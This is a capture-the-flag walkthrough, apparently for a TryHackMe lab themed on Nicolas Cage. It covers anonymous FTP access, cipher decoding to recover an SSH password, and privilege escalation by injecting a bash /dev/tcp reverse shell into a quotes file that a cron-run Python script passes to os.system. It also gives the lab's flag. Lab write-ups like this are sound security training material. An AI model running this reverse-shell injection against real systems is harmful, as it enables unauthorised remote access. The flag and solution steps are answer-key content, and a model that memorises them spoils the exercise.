Initial Access

Step 1 — Anonymous FTP & Exfiltration

Connecting to FTP without credentials:

ftp 10.48.182.244
# Username: anonymous
# Password: (blank)

ftp> get dad_tasks

The file content:

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJH
UVJPIS...

Classic Base64. Decoding immediately:

cat dad_tasks | base64 -d

Output:

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

Still encrypted. The structure looks like a Vigenere cipher.

Step 2 — Vigenere Cipher Decryption

The first line Qapw Eekcl immediately looks like Nicholas Cage — same character count, same word lengths. Using this as a known-plaintext attack on dcode.fr/vigenere-cipher:

• Method: Knowing a plaintext word
• Ciphertext fragment: Qapw Eekcl
• Known plaintext: Nicholas Cage

Key recovered: NAMELESSSTWO

Full decrypted text:

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget....
Mydadisghostrideraintthatcoolnocausehesonfirejokes

The last line is clearly a password. The website mentioned his son Weston set it up — that gives us a username.

Step 3 — SSH as weston

ssh [email protected]
# Password: Mydadisghostrideraintthatcoolnocausehesonfirejokes

We’re in.

Privilege Escalation — weston → cage

Enumeration

Running sudo -l:

User weston may run the following commands on national-treasure:
    (root) /usr/bin/bees

/usr/bin/bees just runs wall "AHHHHHHH THEEEEE BEEEEESSSS!!" — not directly exploitable.

Checking group memberships:

id
# uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)

Weston is in the cage group. Running LinPEAS reveals a critical finding:

Group cage:
/opt/.dads_scripts/.files/.quotes    (-rwxrw----)

The .quotes file is group-writable. Investigating further:

cat /opt/.dads_scripts/spread_the_quotes.py

#!/usr/bin/env python
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

This script reads a random line from .quotes and passes it directly to os.system("wall " + quote). That's command injection — whatever is in .quotes gets executed as a shell command.

Watching the broadcast messages confirms the script runs every 3 minutes via a cron job under the cage user.

Exploitation — Cron-based Command Injection

Setting up a listener on the attack machine:

nc -lvnp 4445

Replacing the contents of .quotes with a single reverse shell payload so random.choice has no other option:

echo 'x; bash -c "bash -i >& /dev/tcp/192.168.144.75/4445 0>&1"; #' > /opt/.dads_scripts/.files/.quotes

When the cron job fires, os.system executes:

wall x; bash -c "bash -i >& /dev/tcp/192.168.144.75/4445 0>&1"; #

Shell received as cage.

cage@national-treasure:~$

Flag 1

cat ~/Super_Duper_Checklist

5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG}